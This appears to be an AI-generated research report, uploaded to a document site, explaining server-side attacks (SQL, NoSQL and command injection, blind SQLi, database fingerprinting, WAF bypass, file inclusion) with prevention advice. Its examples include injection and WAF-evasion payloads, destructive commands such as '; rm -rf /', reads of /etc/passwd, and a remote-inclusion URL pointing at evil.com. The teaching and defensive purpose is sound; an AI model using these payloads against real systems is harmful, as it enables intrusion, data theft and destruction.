0% found this document useful (0 votes)
10 views20 pages

httpschatgpt.comsdr_680dd952be04819

The document provides an overview of server-side security, focusing on SQL injection vulnerabilities and their implications. It details various types of SQL injection attacks, including basic and advanced techniques, as well as methods for blind SQL injection and database fingerprinting. Additionally, it discusses the importance of secure coding practices and the challenges of bypassing Web Application Firewalls (WAFs).

Uploaded by

VARUN KAUSHAL
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
10 views20 pages

httpschatgpt.comsdr_680dd952be04819

The document provides an overview of server-side security, focusing on SQL injection vulnerabilities and their implications. It details various types of SQL injection attacks, including basic and advanced techniques, as well as methods for blind SQL injection and database fingerprinting. Additionally, it discusses the importance of secure coding practices and the challenges of bypassing Web Application Firewalls (WAFs).

Uploaded by

VARUN KAUSHAL
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 20

https://chatgpt.

com/s/dr_680dd952be0481918280158f1c2d895f

Server-Side Security Introduction

Server-side code runs on a web server (e.g. Apache, Nginx, IIS) and handles client
requests – processing input, accessing databases, and generating dynamic responses
en.wikipedia.org

developer.mozilla.org
. In client-server architecture, the browser (client) sends requests (e.g. HTTP
GET/POST) and the server processes them, often involving databases, file systems or
other resources
en.wikipedia.org

developer.mozilla.org
. For example, a login form sends credentials to server-side code, which queries
the database to validate the user. Because server-side code has access to sensitive
resources (databases, file system, OS commands), vulnerabilities here can have
severe consequences. In simple terms, server-side code decides what data to send
back to clients and must be carefully protected. Common server-side technologies
include PHP, Python (Django/Flask), Ruby, Java/ASP.NET, and Node.js – each
interacting with databases and the operating system
en.wikipedia.org

developer.mozilla.org
.

On the server side, security is paramount. Any unsanitized input, misconfiguration


or weak code can lead to critical flaws. For instance, failing to validate a query
parameter can lead to injection attacks that manipulate database commands or OS
commands. In practice, server-side developers must treat all client data as
untrusted, apply strict input validation or sanitization, use parameterized queries
for databases, and follow least-privilege principles for database accounts and OS
operations
owasp.org

imperva.com
. These practices form the foundation of secure server-side programming.
SQL Injection (Basic and Advanced)

Basic SQL Injection: SQL injection occurs when user input is inserted directly into
a SQL query without proper handling, allowing the attacker to change the query’s
logic. For example, consider a PHP snippet:

$sql = "SELECT * FROM users WHERE username='$user' AND password='$pass'";

If the attacker supplies user = 'admin' and pass = "' OR '1'='1", the query
becomes:

SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1';

Since '1'='1' is always true, the attacker bypasses login. OWASP summarizes: a SQL
injection is the insertion of malicious SQL via client input, which can read or
modify sensitive data and even execute administration commands
owasp.org
. A basic sign of vulnerability is when app responses change or errors appear after
submitting input like ' OR '1'='1. In layman’s terms, SQL injection tricks the
server into running an unintended database query.
Advanced SQL Injection: More sophisticated techniques expand on this principle.
Attackers use comments (--, /* ... */) to ignore the rest of a query, stacked
queries to run multiple commands, UNION SELECT to retrieve data from other tables,
or boolean/time-based tricks when output isn’t shown. For instance:

UNION attacks: If an application uses SELECT name FROM products WHERE id = ?,


an attacker might input 1 UNION SELECT username FROM users to append user data to
the result. Example code snippet:

SELECT name FROM products WHERE id = 1


UNION SELECT username FROM users;

Stacked queries (where allowed): Some databases allow multiple statements


separated by ;. E.g., id=1; DROP TABLE users;-- could delete a table.

Second-order injection: Malicious input stored in the database may be injected


later by another query. The input may appear safe initially but cause harm later.

These advanced methods exploit various SQL “features” (comments, string functions,
control flow, etc.) to evade filters or extract data. For example, a numeric
parameter injection might use OR 1=1, while a string parameter injection might
exploit wildcard or boolean logic. OWASP notes that SQL injection can read or
modify all data on the system, execute DB admin commands, or even execute OS
commands if the database supports it
owasp.org
. In practice, advanced attackers enumerate columns and tables (using database
metadata), alter data, or carry out blind injection (see next sections).

Example (Advanced): In an UPDATE query, injection can modify unintended rows. For
example:

UPDATE users SET pass='1' WHERE user='t1' OR 1=1--';

Even if the intended user is “t1”, the OR 1=1 ensures every user’s password is set
to 1
owasp.org
. This illustrates an advanced exploitation of SQL DML (Data Manipulation Language)
statements.
SQL Data Manipulation Language (DML)

SQL’s DML commands (SELECT, INSERT, UPDATE, DELETE) are often the target of
injection. These commands query or modify data in relational tables
en.wikipedia.org
. For example:

SELECT: Retrieves data. A login check like SELECT * FROM users WHERE user='$u'
AND pass='$p' is vulnerable; injecting '$ OR '1'='1 returns all rows.

INSERT: Adds new data. If an app constructs an INSERT with user input (e.g.
INSERT INTO users (name, email) VALUES ('$name', '$email')), an attacker could
inject a ', (malicious) -- sequence to inject extra values or commands.

UPDATE: Modifies data. As shown, UPDATE users SET pass='...' WHERE user='...'
can be coerced to update more rows.

DELETE: Removes data. A vulnerable query like DELETE FROM users WHERE id=$id
could be turned into DELETE FROM users WHERE id=0 OR 1=1, deleting all rows.

These examples show how SQL DML commands, when built insecurely, allow attackers to
insert, update, or delete data at will. OWASP explicitly warns that SQLi can modify
database data (Insert/Update/Delete) or even execute administrative DB commands
owasp.org
. In practice, all DML queries should use parameter binding rather than string
concatenation to prevent injection.
SQL Features and Injection Vectors

SQL provides many features that can be abused by attackers. Key examples include:

String Literals and Quotes: Unclosed quotes (') can break out of string
context. E.g., setting name=O'Reilly requires escaping; if not handled, O'Reilly
ends the string early. Attackers exploit this by injecting their own quote to break
syntax.

Comments: SQL comment syntax (--, #, /* ... */) can truncate the query. For
instance, id=1 -- or id=1 /* comment */ makes the database ignore anything after
it. An attacker might input 1 OR 1=1 -- to turn the WHERE clause into a tautology.

UNION SELECT: Combines results from multiple SELECTs. E.g. UNION SELECT user,
password FROM mysql.user (on MySQL) can append sensitive data into the query
results.

Wildcard and Pattern Matching: In text filters (LIKE '%...%'), injecting % or _


can alter matches. Sometimes attackers use % in a parameter to broaden results.

Boolean Logic: Using AND, OR to control true/false. Example: id=1 OR 'x'='x'


always returns true, bypassing filters.

Subqueries and Joins: Attackers may nest queries. For example:

SELECT * FROM users WHERE user=(SELECT user FROM admins WHERE user='admin');

Manipulating subqueries can reveal data from protected tables.

Control-Flow Functions: Many SQL dialects have functions like IF(), CASE WHEN,
BENCHMARK(), SLEEP(), etc. These are especially useful in blind SQLi. For example,
using CASE WHEN (password LIKE 'adm%') THEN 1/0 ELSE 1 END causes an error if the
password starts with “adm”
portswigger.net
.

Database Metadata Tables: Most databases have system tables (e.g.


information_schema in MySQL) that list tables and columns; attackers query these to
map the schema (see next section).

Stacked Queries (Multiple Statements): Some databases (like MS SQL, PostgreSQL)


allow ; to end one query and start another. An attacker might do 1; DROP TABLE
users;--.

Together, these features give attackers many injection “gadgets.” For example,
bypassing a WAF often involves using alternate encodings or synonyms. OWASP notes
that clever adversaries replace functions to avoid filters: e.g., using MID()
instead of SUBSTRING(), or comparing hex values (0x2A) instead of literals, since
many WAF signatures miss these variants
owasp.org
. In practice, any time user data is inserted into a query, one must consider how
SQL syntax (comments, quotes, logic operators, functions) could be manipulated.

Example (using features): To enumerate columns via blind injection, an attacker


might send:

?id=1 AND (SELECT CASE WHEN (LENGTH(password)>0) THEN SLEEP(5) ELSE SLEEP(0) END)#

This uses CASE WHEN and SLEEP() to pause the server when a condition is true,
revealing information indirectly. Such advanced use of SQL features turns a normal
database query into a data exfiltration channel.
Blind SQL Injection (Boolean, Error-Based, Time-Based)

When a web application is vulnerable to SQL injection but does not directly show
query results or errors, attackers resort to blind techniques
portswigger.net

owasp.org
. In blind SQLi, the attacker infers data by observing side effects: changes in
page content (boolean-based), error messages (error-based), or response delays
(time-based).

Boolean (Content-Based) Blind SQLi: The attacker injects conditions that


evaluate to true or false and observes differences in the page. For example,
consider a URL items.php?id=2. A tester might try:

http://site.com/items.php?id=2 AND 1=2


http://site.com/items.php?id=2 AND 1=1

On a vulnerable site, the first (false) query returns no content, while the second
(true) returns the normal page. If the responses differ, one learns that injection
works
owasp.org
. OWASP gives a concrete example:

“If the content of the page that returns ‘true’ is different than that of the
page that returns ‘false’, the attacker can distinguish the executed query’s truth
value”
owasp.org
.
In short, boolean blind SQLi is asking the database yes/no questions.

Error-Based Blind SQLi: Some databases produce different behavior or error messages
based on injected conditions. Attackers force errors deliberately. For example,
using a conditional error:

' OR (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END)='1

If the condition is true, 1/0 causes a divide-by-zero error. OWASP describes this
technique using CASE WHEN: one payload causes an error (true case) and one does not
(false case)
portswigger.net
. The difference in the HTTP response (an error page vs normal page) reveals which
branch was taken. Thus, even without seeing data, an attacker can extract bits by
turning true/false tests into errors.

Time-Based Blind SQLi: The attacker issues SQL that makes the database wait (sleep)
when a condition is true. Then they measure response time. For instance, MySQL’s
BENCHMARK() or SLEEP() can delay execution. The WSTG notes: appending
%3Bcat%20/etc/passwd to a URL is like injecting ;cat /etc/passwd, and similarly,
appending a pipe | can run shell commands
owasp.org
. For SQL: one might use payloads like:
id=1' AND IF(SUBSTRING(user(),1,1)='r', SLEEP(5), 0)--

If the server’s response is delayed 5 seconds, the first character of user() is


‘r’. OWASP gives examples: on MS SQL id=1' WAITFOR DELAY '00:00:10'-- pauses 10
seconds
owasp.org
; on MySQL one can use IF(..., BENCHMARK(...), null) to cause a delay
owasp.org
. Repeating such tests allows retrieving data one bit at a time.

Each blind SQLi type requires multiple queries but works even when outputs are
suppressed. Tools like sqlmap automate these, but defenders should note that even
well-hidden vulnerabilities can leak data via blind methods
owasp.org

owasp.org
. The key point: lack of visible output does not mean safety. These techniques turn
Boolean logic, errors, or timing into a covert channel.
System Table Fingerprinting

After confirming SQL injection, attackers often enumerate the database schema via
system tables. Most DBMS have special tables with metadata. For example, in MySQL
(and many others) there is information_schema, a database of table and column
information. An attacker can run:

SELECT * FROM information_schema.tables;

to list all table names


portswigger.net
. The output shows table names like Products, Users, Feedback, etc.
portswigger.net
. Then, to get columns of a specific table (say Users):

SELECT * FROM information_schema.columns WHERE table_name = 'Users';

This returns the COLUMN_NAME and DATA_TYPE for each column (e.g. UserId int,
Username varchar, Password varchar)
portswigger.net
. By repeating queries on information_schema, an attacker maps the entire database
schema.

Different databases have their own catalogs. For example, Oracle uses views like
all_tables and all_tab_columns. OWASP’s lab notes:

SELECT * FROM all_tables;


SELECT * FROM all_tab_columns WHERE table_name = 'USERS';

will list all tables and the columns of USERS in Oracle


portswigger.net
. SQL Server has INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS
similarly. By fingerprinting system tables, attackers learn table and column names,
enabling targeted data extraction.

In practice, a tester might automate this (e.g., using sqlmap). Even if output is
hidden, they can use blind techniques on these system tables. But conceptually,
system-table fingerprinting is simply “ask the database what tables and columns
exist.” Defenders should restrict the application DB account to minimal access;
ideally the app should not have rights to query system tables or other schemas.
DBMS Fingerprinting

Before exploiting a vulnerability fully, attackers often determine the database


type and version – called fingerprinting. Knowing the DBMS (MySQL vs MSSQL vs
Oracle vs PostgreSQL) helps tailor payloads and syntax. Common techniques include
querying version functions:

MySQL / MS SQL: SELECT @@version;

PostgreSQL: SELECT version();

Oracle: SELECT * FROM v$version;

PortsSwigger confirms these: “Microsoft, MySQL: SELECT @@version; Oracle: SELECT *


FROM v$version; PostgreSQL: SELECT version()”
portswigger.net
. An attacker might inject a UNION payload such as:

' UNION SELECT @@version--

If this returns, say, Microsoft SQL Server 2017, the attacker knows the DB is SQL
Server
portswigger.net
. Similarly, testing for DB-specific error messages or time-delay functions (e.g.
WAITFOR DELAY exists in SQL Server, SLEEP() in MySQL, pg_sleep() in PostgreSQL) can
reveal the engine. OWASP notes that identifying the DBMS “makes the whole attack
much easier” since one can craft queries specific to that database
owasp.org
.

In short, DBMS fingerprinting uses SQL injections to reveal the database vendor and
version. This is often the first step in a complex attack, since many SQL dialects
differ. Robust defenses randomize or filter error messages and restrict unnecessary
commands, but ultimately avoiding injection altogether (via parameterization) is
the surest defense.
WAF Bypass (Basic and Advanced)

Web Application Firewalls (WAFs) try to block injection, but attackers have many
evasion tricks. WAF bypass techniques range from simple obfuscation to complex
request crafting:

Basic evasion: Change letter case (e.g. SeLeCt), add comments or white-space in
keywords (UN/**/ION SELECT), or use URL-encoding. For example, UNION SELECT might
be written as UNI%4FSELECT or UNI/**/ON SELECT to avoid signature matching.
Attackers also replace ' OR 'a'='a' with logically equivalent forms like OR
0x61=0x61 (hex for ‘a’)
owasp.org
. In one example, many WAFs miss id=1+OR+0x50=0x50, which is equivalent to OR
'P'='P'
owasp.org
. Likewise, using !=, <>, <= instead of = can slip past some filters.

Advanced methods:

HTTP Parameter Pollution (HPP): Send duplicate parameters or split tokens


to confuse parsers. For example, /?id=1/*/union/&id=/select/&id=/1,2,3 (as shown by
OWASP) can assemble a valid UNION SELECT after filtering
owasp.org
.
HTTP Parameter Fragments (HPF): Similar concept using slashes and
fragments: /?a=1+union/&b=/select+1,2&c=/from+users– can defeat naive filters
owasp.org
.

Logical rewriting: OWASP notes that many WAFs don’t catch logical
tautologies written oddly. For instance, replacing substring() with mid(), using
chr(32) for spaces, or using UNHEX('2a') instead of '*' – the server sees the same
logic, but WAF signatures often do not
owasp.org

owasp.org
.

Signature bypass: Some WAFs break input before matching. OWASP highlights that
if a WAF normalizes out comment markers, an injection like
/id=1/un/**/ion/select/1,2,3 might get through
owasp.org
. One example showed that injecting extra slashes (e.g.
1+un//ion+sel//ect+1,2,3--) bypassed a WAF signature
owasp.org
.

Blind injection techniques: Even if data payloads are blocked, attackers may
use blind methods (as above) which rely on logical or time-based cues rather than
union selects. In fact, OWASP’s WAF bypass guide lists “blind SQL injection using
logical requests” as a bypass strategy
owasp.org
– for example, simply doing id=1 OR 0x50=0x50 can slip through many WAFs (since
it doesn’t contain a literal OR 'a'='a' signature)
owasp.org
.

In summary, WAFs are a useful layer of defense, but attackers have many tricks.
OWASP emphasizes that WAF bypass can exploit normalization bugs, use HPP/HPF, evade
signatures, or turn to blind attacks
owasp.org
. For developers, this means never rely solely on a WAF – the underlying code must
still be secure (proper input handling and parameterization).
NoSQL Injections (MongoDB, CouchDB, Redis)

Overview: NoSQL databases (e.g. MongoDB, CouchDB, Redis) use different query models
(JSON queries, REST APIs, etc.) but can also suffer injection if user input is
embedded insecurely. NoSQL injection lets attackers “interfere with the queries”
made to the database
portswigger.net
. Consequences include bypassing authentication, extracting or altering data, DoS,
or even remote code execution
portswigger.net
.

MongoDB Injection: Often occurs when a JSON query or a query operator includes
unsanitized input. For example, a Node.js app might do:

db.users.findOne({ username: req.body.user, password: req.body.pass });

If an attacker sets req.body.user = { "$ne": null }, the query becomes { username:


{ $ne: null }, password: ... }, which matches any user. Or they might exploit
$where:

{ $where: "this.username == 'admin' && this.password == '" + userInput + "'" }

injecting JavaScript. PortSwigger explains that by breaking MongoDB query syntax,


one can add conditions: for instance, injecting '||'1'=='1' into a category filter
changed this.category=='fizzy' into this.category=='fizzy'||'1'=='1', effectively
ignoring other restrictions
portswigger.net
. Similarly, inserting a null character (\0) can truncate the query so that
conditions after it (like this.released==1) are ignored
portswigger.net
. MongoDB operators themselves ($where, $ne, etc.) become injection vectors if user
data is not validated.

CouchDB Injection: CouchDB uses HTTP/REST interfaces (e.g. POSTing JSON to /_find)
and JavaScript map/reduce. If an application concatenates user input into a view
function or query, attackers can inject malicious code or filters. For example,
unsafely constructing a Mango query or design document name can allow arbitrary
function execution. (While CouchDB injection is less commonly documented, the
principle is similar: untrusted data altering JSON queries or view logic.) Always
treat any user-provided parameter that ends up in a query or file path carefully.

Redis Injection: Redis is a key-value store, but injections can occur in client
calls. As one researcher noted, the Redis Node.js driver allows calls as arrays or
varargs
medium.com
. For instance, client.set("key", "value") and client.set(["key","value"]) do the
same thing. An attacker controlling input might send a JSON body that turns the
single argument into an array, allowing them to overwrite subsequent parameters.
Example from a Node.js scenario:

app.post('/', (req,res) => {


redis.set(req.body.key, "default");
});

Normally req.body.key = "foo" is fine. But if the attacker sends "key":


["foo","malicious_command"], the Redis set call interprets this as
client.set(["foo","malicious_command"], "default"), which can reorder or inject
commands
medium.com
. Similarly, publishing to channels or other multi-argument commands can be
hijacked. The key lesson: even key-value commands must sanitize or restrict types
of input.

In all NoSQL cases, the rule is the same: never trust user input that gets embedded
into a query or command. Use safe APIs or strict query builders. For MongoDB, this
means avoiding concatenating strings into JSON queries (use parameterized methods
instead) and avoid dangerous operators like $where if possible.
Command Injection (Windows, Linux, Vulnerabilities)

What is Command Injection? It’s the execution of arbitrary OS commands through a


vulnerable application input. Imperva defines it as “injecting a command into the
system shell on a web server”
imperva.com
. In simpler terms, the app takes user data and passes it to a shell or system call
without proper checks. For example, if a PHP script does system("ls " .
$_GET['dir']); and the attacker sets dir="; rm -rf /", the shell sees ls ; rm -rf /
and executes both commands. OWASP gives a C example:
system("/usr/bin/cat " + argv[1]);

If the user supplies "; rm -rf /", the system call becomes /usr/bin/cat ; rm -rf /
– the rm -rf runs and deletes everything
owasp.org
. This is a classic injection.

Linux Command Injection: In Unix-like systems, common separators include ;, &&, ||,
| and backticks. For web apps, users often inject | or ;. The OWASP testing guide
shows examples: appending a pipe or semicolon can run commands. For instance:

GET /userData.pl?doc=/bin/ls|

This causes the server to list directory contents because the | pipes into another
command
owasp.org
. Another example:

GET /something.php?dir=%3Bcat%20/etc/passwd

Here %3B is ;, so the server runs ; cat /etc/passwd, revealing the password file
owasp.org
. Typical vulnerable code might be exec("ping " . $_GET['ip']);. If an attacker
sets ip=127.0.0.1; whoami, the server executes ping 127.0.0.1; whoami.

Windows Command Injection: On Windows servers, command chaining uses symbols like
&, |, &&, or ||. For example, a vulnerable call popen("dir " + userInput) could be
exploited by userInput="C:\\ & del C:\\important.txt". It’s more environment-
dependent (batch vs PowerShell), but the principle is the same: anything that
causes the shell to interpret part of the input as commands can be abused. On
Windows, one must watch for use of % (environment vars), backtick (PowerShell), or
caret ^ as escape. If using Runtime.exec() in Java on Windows, remember it doesn’t
spawn a shell by default, but concatenated commands with cmd /c can.

Common Vulnerabilities: Any use of system calls (system(), exec(), shell_exec(),


popen(), backticks in PHP, etc.) with string concatenation is dangerous.
Environment variables or PATH manipulation can also lead to control (as OWASP
examples show with execl() and PATH hijacking
owasp.org
). In practice:

Never pass raw user input to a shell. Use language-native APIs instead (e.g.
database APIs, language I/O functions).

If you must call a command, validate or whitelist allowed arguments rigorously.

On Linux, escape or reject metacharacters (; | & \ etc.). On Windows, similarly


escape & | > < ^.

Use least privilege: the process running commands should have minimal rights
(e.g. not root/Administrator).

Example (Linux): A PHP snippet:

$ip = $_GET['ip'];
system("ping -c 4 " . $ip);

If ip is 127.0.0.1; rm -rf /, the server will ping localhost then delete


everything. This vulnerability arises because the ; and subsequent text are passed
to the shell. Proper coding would use escapeshellarg() or avoid shell invocation
entirely.
File Inclusion/Traversal Vulnerabilities (Windows, Linux)

Local File Inclusion (LFI): This flaw allows attackers to include and often execute
files on the web server. It typically occurs when a script takes a filename from
user input and uses it directly in an include or file-read function. OWASP
explains: if page parameter maps directly to an include, an attacker can
inject ../../ sequences to traverse directories
owasp.org

owasp.org
. For instance:

http://vulnsite/preview.php?file=example.html

If vulnerable, changing it to

?file=../../../../etc/passwd

will make the server include the Unix password file, revealing its contents
owasp.org
. On Windows, a similar attack might be file=..\..\windows\win.ini. The key is
directory traversal characters: ../ on Linux or ..\ on Windows. The exploit may
simply display file contents or, if the file is code (like a .php), execute it.
Either way, it leaks information or control.

Remote File Inclusion (RFI): If the application fetches and includes remote URLs
(e.g. include($_REQUEST['file']); without restriction), an attacker can set
file=http://evil.com/shell.txt. The server then downloads and executes the
attacker’s script. OWASP notes this: using an external URL in the include parameter
causes the remote file’s code to run
owasp.org

owasp.org
. RFI often requires allow_url_include enabled (in PHP) or similar config; if
possible, it should always be disabled.

File Upload Issues: Though not explicitly asked, it’s related. Allowing file
uploads (e.g. images) can be risky if not checked. Attackers can upload malicious
scripts or .htaccess files. On Linux, uploaded .php can be run; on Windows, .asp or
.aspx might run. Even if extension checks are done, using magic bytes or double
extensions (shell.php.jpg) can bypass. File cases and paths: Windows paths are
case-insensitive, but Linux is case-sensitive (/etc/PaSSwd won’t work on Linux).
Always normalize and validate paths.

Examples:

Directory Traversal (Linux): GET /download.php?file=../../../../etc/passwd


shows system password file.

File Inclusion (PHP): include($_GET['page'] . ".php"); is vulnerable. Use a


whitelist of allowed pages instead.

.htaccess Upload: If uploads are placed in a web-accessible folder and Apache


allows .htaccess, an attacker could upload a .htaccess that re-enables PHP
execution. For instance, php_value engine on in a malicious .htaccess could
make .jpg run as PHP.
In summary, file vulnerabilities allow access to sensitive data or execution of
malicious code. Prevention includes sanitizing paths, disabling dangerous PHP
settings (allow_url_include, allow_url_fopen), placing uploads outside web root,
and verifying file names/contents. OWASP guides emphasize using strict input
validation and blacklists for file paths
owasp.org

owasp.org
.
Apache .htaccess Issues

Apache’s .htaccess files allow directory-level configuration overrides. Misuse


of .htaccess can introduce vulnerabilities. For example:

Overly Permissive AllowOverride: If Apache is configured with AllowOverride


All, then any user-writable directory can have a .htaccess placed. An attacker who
can upload files could drop a malicious .htaccess to alter behavior. This could
enable PHP execution in an upload directory (e.g. adding AddType application/x-
httpd-php .jpg) or alter security settings (like turning off Options -Indexes so
directory listing appears).

Incorrect Rules: Even admin-created .htaccess can leak info if miswritten. For
example, a directive php_value display_errors On might reveal sensitive server
paths in error messages.

Case Sensitivity: Note that on Linux, .htaccess is case-sensitive (must


be .htaccess exactly), whereas on Windows (NTFS), HTACCESS might also work.
Attackers may exploit this to bypass filters.

In practice, limit .htaccess usage: ideally set AllowOverride None in the main
config and manage settings globally. If .htaccess must be used, restrict
directories and thoroughly validate any uploaded files.
Server-Side Security Epilogue

Server-side security is about layers of defense. We’ve seen how injections (SQL,
NoSQL, OS) exploit untrusted input in queries or commands. The paramount rule is:
never trust user input. Always use parameterized queries or safe APIs (for
databases and OS calls) so that input is treated as data, not code. For example,
use prepared statements (PDO with bound parameters, or ORM query builders) instead
of string concatenation for SQL
owasp.org

portswigger.net
. Validate and sanitize inputs rigorously: apply whitelists for filenames, numeric
ranges, and drop any control characters before using input in a shell.

Least privilege is critical: the database account used by the web app should have
only the minimal rights needed (e.g. only SELECT for queries, not DROP TABLE), so
even a successful SQLi can only retrieve limited data. Similarly, the OS user
running the web server should not be root/Administrator; chroot or containers can
isolate filesystem access.

Keep error messages generic in production (so attackers can’t glean SQL errors),
and log details internally. Use WAFs as an extra barrier, but recognize they can be
bypassed
owasp.org
– they are not a substitute for correct coding. Regularly update software (to fix
known vulnerabilities like the recent ones in DB engines or web frameworks).
Conduct security reviews and code audits for injection risks (OWASP Testing Guide
provides methodologies for SQL and OS injection).

Finally, stay informed on new attack techniques. Server-side technologies evolve


(e.g., JSON/NoSQL, new SQL features, or serverless paradigms), and so do the
attacks. This guide has provided deep examples and references; but security is an
ongoing process. By adhering to best practices like parameterization, input
validation, proper configuration, and least privilege, developers can greatly
reduce the attack surface of the server side. Effective defense leaves no
significant gaps for the injection techniques we’ve covered.

Sources: Authoritative references include OWASP and security research. For


instance, OWASP defines SQL injection attacks and their consequences
owasp.org
, and provides cheat sheets on prevention. PortSwigger’s Web Security Academy
offers in-depth tutorials on blind injection and database enumeration
owasp.org

portswigger.net
. Imperva and others document command injection risks
imperva.com
. These sources (cited above) inform the examples and methods in this guide. Their
detailed explanations underpin the advanced concepts presented here.
Citations
Favicon

Server-side scripting - Wikipedia


https://en.wikipedia.org/wiki/Server-side_scripting
Favicon

Introduction to the server side - Learn web development | MDN


https://developer.mozilla.org/en-US/docs/Learn_web_development/Extensions/Server-
side/First_steps/Introduction
Favicon

SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection
Favicon

What Is Command Injection? | Examples, Methods & Prevention | Imperva


https://www.imperva.com/learn/application-security/command-injection/
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL - Wikipedia
https://en.wikipedia.org/wiki/SQL
Favicon

What is Blind SQL Injection? Tutorial & Examples | Web Security Academy
https://portswigger.net/web-security/sql-injection/blind#error-based-sql-injection
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon
What is Blind SQL Injection? Tutorial & Examples | Web Security Academy
https://portswigger.net/web-security/sql-injection/blind
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
Favicon

WSTG - Latest | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/latest/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/12-
Testing_for_Command_Injection
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
Favicon

Examining the database in SQL injection attacks | Web Security Academy


https://portswigger.net/web-security/sql-injection/examining-the-database#listing-
the-contents-of-the-database
Favicon

Examining the database in SQL injection attacks | Web Security Academy


https://portswigger.net/web-security/sql-injection/examining-the-database#listing-
the-contents-of-the-database
Favicon

Examining the database in SQL injection attacks | Web Security Academy


https://portswigger.net/web-security/sql-injection/examining-the-database#listing-
the-contents-of-the-database
Favicon

Examining the database in SQL injection attacks | Web Security Academy


https://portswigger.net/web-security/sql-injection/examining-the-database
Favicon

Examining the database in SQL injection attacks | Web Security Academy


https://portswigger.net/web-security/sql-injection/examining-the-database
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

SQL Injection Bypassing WAF | OWASP Foundation


https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF
Favicon

NoSQL injection | Web Security Academy


https://portswigger.net/web-security/nosql-injection
Favicon

NoSQL injection | Web Security Academy


https://portswigger.net/web-security/nosql-injection
Favicon

NoSQL injection | Web Security Academy


https://portswigger.net/web-security/nosql-injection
Favicon

NoSQL Injection > Redis. Ever considered injection a problem for… | by Patrick
Spiegel | Medium
https://medium.com/@PatrickSpiegel/https-medium-com-patrickspiegel-nosql-injection-
redis-25b332d09e58
Favicon

Command Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Command_Injection
Favicon

WSTG - Latest | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/latest/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/12-
Testing_for_Command_Injection
Favicon

WSTG - Latest | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/latest/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/12-
Testing_for_Command_Injection
Favicon

Command Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Command_Injection
Favicon

WSTG - v4.2 | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/v42/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-
Testing_for_Local_File_Inclusion
Favicon

WSTG - v4.2 | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/v42/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-
Testing_for_Local_File_Inclusion
Favicon

WSTG - v4.2 | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/v42/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-
Testing_for_Remote_File_Inclusion
Favicon

WSTG - v4.2 | OWASP Foundation


https://owasp.org/www-project-web-security-testing-guide/v42/4-
Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-
Testing_for_Remote_File_Inclusion
Favicon

Examining the database in SQL injection attacks | Web Security Academy


https://portswigger.net/web-security/sql-injection/examining-the-database
Favicon

Blind SQL Injection | OWASP Foundation


https://owasp.org/www-community/attacks/Blind_SQL_Injection
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
---------------------

Okay, so the user has provided a list of server-side security topics, including SQL
Injection, NoSQL databases, Command Injection, and File Vulnerabilities. They want
detailed explanations in both layman's and advanced terms, similar to how I handled
the cryptography topics before. Let me start by breaking down each section.

First, the SQL Injection sections. I remember that SQL Injection involves inserting
malicious SQL code into a query. The user mentioned both DML and SQL Features, so I
should explain those. DML is about data manipulation like SELECT, INSERT. Layman's
terms could be "the language used to talk to databases," while advanced would
mention specific commands and their roles in injection.

Blind SQL Injection Advanced and Error & Time based SQL Injection are next. Blind
means you don't get direct feedback, so you infer from behavior like delays or
errors. For layman, maybe comparing it to guessing a password by how long it takes
to get a response. Advanced would involve discussing boolean-based and time-based
techniques, maybe mentioning tools like sqlmap.

Then there's System Table Fingerprinting and DBMS Fingerprinting. These are about
figuring out the database structure and type. Layman's explanation could be like
detecting what kind of database the server uses by its responses. Advanced terms
would involve querying version tables or using specific functions unique to MySQL,
PostgreSQL, etc.

